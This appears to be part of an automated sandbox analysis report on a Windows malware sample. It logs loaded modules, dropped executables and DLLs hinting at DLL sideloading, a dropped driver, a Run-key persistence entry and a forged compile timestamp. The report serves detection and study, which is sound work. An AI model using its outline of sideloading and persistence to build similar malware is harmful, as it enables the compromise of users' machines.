Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dinput8.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Section loaded: owutils.dll	Jump to behavior
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: unityplayer.dll
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: unityplayer.dll
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{a07034fd-6caa-4954-ac3f-97a27216f98a}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

File written: C:\Users\user\8cb0240ffaae4\static.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002487000.00000004.00000800.00020000.00000000.sdmp, #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.000000000249B000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1741150045.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cdp.pdb source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: Microsoft_Xtools.exe, 00000009.00000003.1780225829.000002A39D4D2000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1782816540.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1781387142.000002A39D4DB000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1773029245.000002A39D4DE000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1770409862.000002A39D2D8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1778381910.000002A39D4D5000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1784322808.000002A39D4D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\BuildAgent\work\52fbca0759d0cd8c\iclsClient\x64\Release\iclsProxy.pdb source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: OneCoreUAPCommonProxyStub.pdbUGP source: Microsoft_Xtools.exe, 00000009.00000003.1775730473.000002A39D4DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\SVN\Xzy_ClientUi_Win_Dev\OUT\build\bin\x64\Master\Launcher_x64_Master_il2cpp.pdb source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000000.1631995825.00007FF69400E000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\dll_UnityPlayer_AutoRun\WhiteDll\x64\Release\WhiteDll.pdb source: kitty.exe, 0000000E.00000002.3135272512.00007FF8DC5E3000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: CoreUIComponents.pdb source: Microsoft_Xtools.exe, 00000013.00000003.2302053190.00000187C7EF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdb source: Microsoft_Xtools.exe, 00000009.00000003.1777690969.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CoreUIComponents.pdbUGP source: Microsoft_Xtools.exe, 00000013.00000003.2302053190.00000187C7EF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: OneCoreUAPCommonProxyStub.pdb source: Microsoft_Xtools.exe, 00000009.00000003.1775730473.000002A39D4DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Jenkins\workspace\new-overwolf-client\Output\Release\Overwolf.pdbBSJB source: kitty.exe, 0000000E.00000000.2070770589.00007FF6F46C2000.00000020.00000001.01000000.00000012.sdmp
Source:	Binary string: E:\Jenkins\workspace\new-overwolf-client\Output\Release\Overwolf.pdb source: kitty.exe, 0000000E.00000000.2070770589.00007FF6F46C2000.00000020.00000001.01000000.00000012.sdmp
Source:	Binary string: Windows.Storage.pdbUGP source: Microsoft_Xtools.exe, 00000009.00000003.1777690969.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002487000.00000004.00000800.00020000.00000000.sdmp, #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.000000000249B000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1741150045.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cdp.pdbUGP source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: Microsoft_Xtools.exe, 00000009.00000003.1780225829.000002A39D4D2000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1782816540.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1781387142.000002A39D4DB000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1773029245.000002A39D4DE000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1770409862.000002A39D2D8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1778381910.000002A39D4D5000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1784322808.000002A39D4D7000.00000004.00000020.00020000.00000000.sdmp

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Static PE information: 0xA0DFE294 [Mon Jul 12 17:44:52 2055 UTC]

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Static PE information: real checksum: 0x6e82a should be: 0x7e6a2
Source: blackdll.dll.9.dr	Static PE information: real checksum: 0x0 should be: 0x3db74

Source: VCRUNTIME140.dll.4.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.4.dr	Static PE information: section name: _RDATA
Source: MSVCP140.dll.4.dr	Static PE information: section name: .didat
Source: kitty.exe.9.dr	Static PE information: section name: .addImp
Source: MSVCP140.dll.9.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.9.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.9.dr	Static PE information: section name: _RDATA

Source: C:\Windows\explorer.exe	Code function: 12_2_07B6D0A8 push 6F0001CFh; iretd		12_2_07B6D0AD
Source: C:\Windows\explorer.exe	Code function: 12_2_07B6D09C push rbx; iretd		12_2_07B6D09D

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Windows\explorer.exe

File created: C:\ProgramData\kernelquick.sys

Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	File created: C:\Users\user\8cb0240ffaae4\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	File created: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	Jump to dropped file
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	File created: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Jump to dropped file
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	File created: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\MSVCP140.dll	Jump to dropped file
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	File created: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\OWUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	File created: C:\Users\user\8cb0240ffaae4\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	File created: C:\Users\user\8cb0240ffaae4\UnityPlayer.dll	Jump to dropped file
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	File created: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	File created: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	File created: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\blackdll.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	File created: C:\Users\user\8cb0240ffaae4\MSVCP140.dll	Jump to dropped file

Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bfly			Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bfly			Jump to behavior

Source: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\DeepSer MyData

Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
